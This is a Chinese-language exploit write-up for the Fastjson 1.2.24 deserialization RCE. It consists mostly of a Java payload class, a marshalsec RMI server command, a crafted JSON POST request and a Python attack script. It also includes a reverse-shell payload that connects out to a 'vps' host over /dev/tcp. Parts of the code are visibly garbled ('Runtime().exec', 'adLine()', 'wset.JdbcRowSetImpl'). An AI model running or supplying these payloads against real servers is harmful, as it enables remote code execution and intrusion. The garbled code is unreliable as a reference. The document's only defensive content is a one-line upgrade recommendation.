fastjson1.2.24反序列化导致任意命令执⾏漏洞简介
Fastjson 是⼀个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。
Fastjson 可以操作任何 Java 对象,即使是⼀些预先存在的没有源码的对象。
poc
//FileName:Exploit.java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = adLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
编译成class的⽂件上传到vps。
javac  Exploit.java
通过python3 启动http服务,将poc移⾄改⽬录。
python3  -m  http.server 8888
开启远程加载类服务,可以通过Jrmp服务或者Ldap服务加载远程类⽂件
JRMP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "vps:8888/#Exploit" 9999
构造数据包加载远程类
POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"wset.JdbcRowSetImpl",
"dataSourceName":"rmi://vps:9999/TouchFile",
"autoCommit":true
}
}
⽂件被创建,命令执⾏成功
反弹shell
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime().exec(new String[]{"bash", "-c", "bash -i >&  /dev/tcp/vps/55555 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = adLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
fastjson字符串转数组
public static void main(String[] args) throws Exception {
}
}
⼯具附件
脚本检测:
#FileName:fastjson-1.2.24_rce.py
import sys
import requests
if len(sys.argv)!=3:
print('+------------------------------------------------------------------------------------+')
print('+      RMIServer: rmi://ip:port/exp                                                  +')
print('+      LDAPServer: ldap://ip:port/exp                                                +')
print('+------------------------------------------------------------------------------------+')
print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer>                              +')
print('+ EXP: python3 fastjson-1.2.24_rce.py 1.1.1.1:8080/ ldap://2.2.2.2:88/Object  +')
print('+ VER: fastjson<=1.2.24                                                              +')
print('+------------------------------------------------------------------------------------+')
url = sys.argv[1]
server = sys.argv[2]
headers = {
'Host': "127.0.0.1",
'Content-Type': "application/json",
'Accept-Encoding': "gzip, deflate",
'Connection': "close",
'Accept': "*/*",
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
}
payload = '''
{
"b":{
"@type":"wset.JdbcRowSetImpl",
"dataSourceName":"%s",
"autoCommit":true
}
}
''' %server
try:
r = requests.post(url, payload, headers=headers, timeout=10)
print ("[+] RMI/LDAP Send Success ")
except:
print ("[-] RMI/LDAP Send Failed ")
python fastjson-1.2.24_rce.py
修复建议
升级fastjson到最新版本

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。